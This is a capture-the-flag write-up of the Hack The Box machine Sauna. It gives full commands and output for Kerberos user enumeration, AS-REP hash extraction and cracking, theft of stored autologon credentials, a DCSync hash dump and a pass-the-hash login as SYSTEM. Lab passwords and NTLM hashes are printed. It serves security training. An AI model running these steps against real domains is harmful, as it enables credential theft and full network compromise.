Zweilosec's writeup on the easy-difficulty Windows machine Sauna from https://hackthebox.eu
Overview
A fairly easy Windows machine that requires a little 'outside the box' thinking in order to get the initial foothold. After that, simple enumeration will give everything else that is needed.
Adding the flag -just-dc-ntlm will make it dump only the Lanman and NT hashes.
GetNPUsers.py
Extracts the Kerberos krb5asrep hashes for users from the domain controller. This requires a valid DOMAINNAME/username pair to run. Will only extract hashes for users that do not require Kerberos pre-authentication.
In this example the output will be in hashcat format.
Extracting Windows Auto-logon credentials with reg query
The command reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" will output any stored Windows Auto-logon credentials.
Using hashcat to crack Kerberos hashes
In order to crack krb5asrep type hashes the -m 18200 option is needed.
hashcat -m 18200 -a 0 <input_file> <wordlist> --force
Enumerating valid usernames through kerberos using MetaSploit
In the Metasploit console the auxiliary(gather/kerberos_enumusers) tool enumerates valid users against Kerberos from a list. This scanner also checks if each user has "pre-auth required" enabled.
Enumeration
Nmap scan
I started my enumeration with an nmap scan of 10.10.10.175. The options I regularly use are: -p-which is a shortcut which tells nmap to scan all ports, -sC is the equivalent to --script=default and runs a collection of nmap enumeration scripts against the target, -sV does a service scan, and -oN saves the output with a filename of <name>.
zweilos@kalimaa:~/htb/sauna$ sudo nmap -p- -sC -sV -oN sauna.nmap 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 14:07 EDT
Nmap scan report for 10.10.10.175
Host is up (0.14s latency).
Scanned at 2020-06-01 14:07:43 EDT for 553s
Not shown: 65515 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-02 01:15:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
| ssl-date:
|_ ERROR: Unable to obtain data from the target
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
| ssl-date:
|_ ERROR: Unable to obtain data from the target
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
| ssl-date:
|_ ERROR: Unable to obtain data from the target
3269/tcp open tcpwrapped
| ssl-date:
|_ ERROR: Unable to obtain data from the target
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
61610/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/1%Time=5ED544ED%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h04m02s
| nbstat:
|_ ERROR: Name query failed: TIMEOUT
| smb-os-discovery:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-security-mode:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-02T01:18:23
|_ start_date: N/A
Final times for host: srtt: 137789 rttvar: 1734 to: 144725
Nmap done: 1 IP address (1 host up) scanned in 553.41 seconds
Lots of ports were open on this machine! Based on the plethora of related ports, it was fairly easy to guess that this machine was a Windows-based domain server.
Hmm... not much to go off from LDAP, though I was able to find one potential user named Hugo Smith (unfortunately there was no Windows username to go with it.)
Egotistical Bank website
On port 80 I found a website hosted for Egotistical Bank. Most of this site consisted of template pages with lots of lorem ipsum paragraphs and very little information. One page caught my eye, however.
I found a list of potential users on the 'About Us' page under the "Meet The Team" heading. Since these were potentially employees at Egotistical Bank I used some common username formats to turn these names into potential usernames, then proceeded to test if any of them were valid.
This was my list of possible usernames based on common business formats I have seen in the past. There was also one user's name (Hugo Smith) that I had gotten from from ldapsearch that was not on the website, so I added it to the list as well.
Road to User
Finding user creds
Finding user credentials was pretty fast and straightforward for this machine, despite not having a lot of information to go on. I used my list of potential usernames and used the Metasploit module auxiliary/gather/kerberos_enumusers to check if any of these usernames were valid, and if they had Kerberos pre-authentication turned off. This setting is a security feature of Kerberos which gives protection against password-guessing brute force attacks.
msf5 auxiliary(gather/kerberos_enumusers) > run
[*] Running module against 10.10.10.175
[*] Validating options...
[*] Using domain: EGOTISTICALBANK...
[*] 10.10.10.175:88 - Testing User: "hsmith"...
[*] 10.10.10.175:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.175:88 - User: "hsmith" is present
After running this scan, I only got back one hit for a valid username hsmith. I now had a valid username and the business format for other potential usernames . One oddity I noticed: the scan would crash Metasploit for some reason when it got to the name fsmith (I tried this multiple times with and without that name to be sure). I kept this username on the possibly valid list just in case.
zweilos@kalimaa:~/impacket/examples$ python3 GetNPUsers.py -outputfile sauna.hash -format hashcat -usersfile /home/zweilos/htb/sauna/users -no-pass -dc-ip 10.10.10.175 EGOTISTICALBANK/hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Since fsmith crashed Metasploit I was hoping that it was because there was something in the output that it didn't understand. I decided to use another script that would give the same information to me, but would also dump the Kerberos hashes for any users who did not require the pre-authentication check. I used the GetNPUsers.py tool from the Impacket python examples collection to try to get the krb5asrep hashes using . In order to pull these hashes you need a valid username in the format DOMAINNAME/username. Luckily I had the domain name from my early enumeration and a valid username that Metasploit had gotten from the domain controller. I set my output to be saved in hashcat format so I could use that tool to try to quickly crack the hash.
At first I thought that I was just getting back the same results as the Metasploit module until I counted the number of names that it was outputting results for. I realized that there was one result unaccounted for so I looked in the output directory and opened my output file sauna.hashto see if I had gotten any hits.
It contained the Kerberos hash for the user fsmith! I had been right in my hunch that it was still a valid username despite the odd Metasploit behavior earlier.
I am not sure why GetNPUsers.py doesn't inform you when it finds a valid user and gets the hash, so pay attention to your output files!
Next I fired up hashcat to try to crack the password hash. The option -m 18200 is the flag which tells hashcat that this is a krb5asrep type hash and -a 0 makes it use the words straight from the specified wordlist without any mangling rules applied.
Including the time spent building the dictionary file and getting everything loaded, this hash took less than two minutes to be cracked using hashcat. The password for fmsith was apparently Thestrokes23 (to see it in the output above you have to scroll all the way to the right...the output shows it at the end of the hash string).
User.txt
Now that I had a username and password, I could try to log into the server using evil-winrm. This tool connects to the Windows Remote Management service that is usually open on port 5985.
zweilos@kalimaa:~/htb/sauna$ evil-winrm -i 10.10.10.175 -u fsmith
Enter Password: Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\FSmith\Documents>
Luckily for me fsmith was a member of the Remote Management Users group and I was able to log in. Next I collected my hard-earned loot.
After running the command whoami /all my next step when gaining access as a new user is to try to do as much enumeration as possible. The Windows Privilege Escalation Awesome Scripts (Winpeas) tool is a collection of scripts that make this enumeration extremely simple. In this case, it made moving laterally to another user very easy to complete.
--Cut from WinPEAS.exe--
C:\Windows\System32\OpenSSH\
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : 35mEGOTISTICALBANK
DefaultUserName : 35mEGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
[+] Home folders found(T1087&T1083&T1033)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith
C:\Users\Public
C:\Users\svc_loanmgr
Auto-logon is a terrible, terrible service that should never be used, but makes it convenient for users when they are the only ones who use a computer. As the name implies, Windows will automatically log the user on by caching their credentials. I verified this output by looking up the registry key where this information is stored using the reg query command. Auto-logon credentials are stored in the keyHKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon.
For some reason there was a discrepancy between the username of the account that had auto-logon enabled (svc_loanmanager), and the account that had a user folder on the machine (svc_loanmgr). I decided to try logging in using svc_loanmgr since that was the name of the user's folder.
Moving laterally to user svc_loanmgr
zweilos@kalimaa:~/htb/sauna$ evil-winrm -i 10.10.10.175 -u svc_loanmgr
Enter Password: Moneymakestheworldgoround!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
If you have credentials you can use Impacket's secretsdump.py to try to dump password hashes. These hashes can then be used to either crack and retrieve the passwords or in a pass-the-hash attack.
zweilos@kalimaa:~/impacket/examples$ python3 ./secretsdump.py -just-dc-ntlm EGOTISTICALBANK/svc_loanmgr@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:21e6b7db7208776337bf12e6c910a32d:::
[*] Cleaning up...
After successfully extracting the password hash for the Administrator account I decided to practice doing a pass-the-hash attack (I didn't attempt to crack the hashes to extract the passwords so I cannot say how long it might take!).
Getting a shell
The blog at https://en.hackndo.com/pass-the-hash/ has a nice write-up on how and why pass-the-hash attacks work. I used the psexec.py tool from Impacket's examples, though there are many tools for doing this attack against Windows.
zweilos@kalimaa:~/impacket/examples$ sudo python3 psexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.22.dev1+20200520.120526.3f1e7ddd - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file useqULkm.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service hsLI on 10.10.10.175.....
[*] Starting service hsLI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Not only did this tool log me in, but it also elevated my privilege to nt authority\system!
Root.txt
The final thing to do after gaining full control over this machine was to get my proof.
Thanks to egotisticalSW for creating this fun and easy Windows machine. It offered a few chances to learn some new things while giving the opportunity to brush up on Windows enumeration skills.
If you like this content and would like to see more, please consider buying me a coffee!
